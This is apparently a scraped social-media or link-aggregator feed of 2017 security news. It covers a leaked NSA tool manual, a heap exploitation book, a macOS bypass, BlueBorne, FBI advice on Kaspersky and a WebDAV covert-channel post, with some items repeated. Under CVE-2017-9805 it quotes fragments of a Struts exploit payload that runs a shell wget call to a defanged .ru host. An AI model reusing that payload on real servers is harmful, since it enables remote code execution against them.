Happenstance or #DailyScriptlet trolling? Uploaded 3 minutes ago: https://t.co/y6AFs5fWSi
The new leaked manual for alleged NSA tool UNITEDRAKE seems to show NSA used McAfee antivirus. (h/t @RickeyGevers)
Heap Exploitation
This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.
https://www.gitbook.com/book/dhavalkapil/heap-exploitation/details
This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.
https://www.gitbook.com/book/dhavalkapil/heap-exploitation/details
GitBook
Heap Exploitation · GitBook
heap-exploitation: This book on heap exploitation is a guide to understanding the internals of glibc's heap. It also describes, in detail, various attacks possible on the heap structure.
High Sierra's 'Secure Kernel Extension Loading' is Broken
› a new 'security' feature in macOS 10.13, is trivial to bypass
https://objective-see.com/blog/blog_0x21.html
› a new 'security' feature in macOS 10.13, is trivial to bypass
https://objective-see.com/blog/blog_0x21.html
CVE-2017-9805
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://xxx [.]ru:8082/?
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://xxx [.]ru:8082/?
echo ...vulnerablesite...</string>Using WebDAV PROPFIND only requests as a C2 channel. The why, the how, and the tool in this blog post: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/amp/
arno0x0x
Using WebDAV features as a covert channel
I’ve recently been looking into a fancy covert channel, targeting Windows familly operating systems, for either: deliver various malicious payloads (shellcode, binaries, scripts, whateverR…
This software builds a dynamic graphical website showing the computers with their hostnames and IP addresses in the local network. https://github.com/KruDex/lan-monitor/blob/master/README.md
GitHub
KruDex/lan-monitor
lan-monitor - Simple website to display the LAN status based on a nmap scan
FBI reportedly advising companies to ditch Kaspersky apps
The law enforcement agency has met with firms in the energy and tech sectors.
https://www.engadget.com/2017/08/21/fbi-kaspersky-lab-private-sector/?utm_source=tpx.mx
The law enforcement agency has met with firms in the energy and tech sectors.
https://www.engadget.com/2017/08/21/fbi-kaspersky-lab-private-sector/?utm_source=tpx.mx
Engadget
FBI reportedly advising companies to ditch Kaspersky apps
The FBI has reportedly been briefing firms on the cyberespionage threat posed by Kaspersky.
The IoT Attack Vector “BlueBorne” Exposes Almost Every Connected Device https://www.armis.com/blueborne/#/technical
Armis
BlueBorne Cyber Threat Impacts Amazon Echo and Google Home
Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home.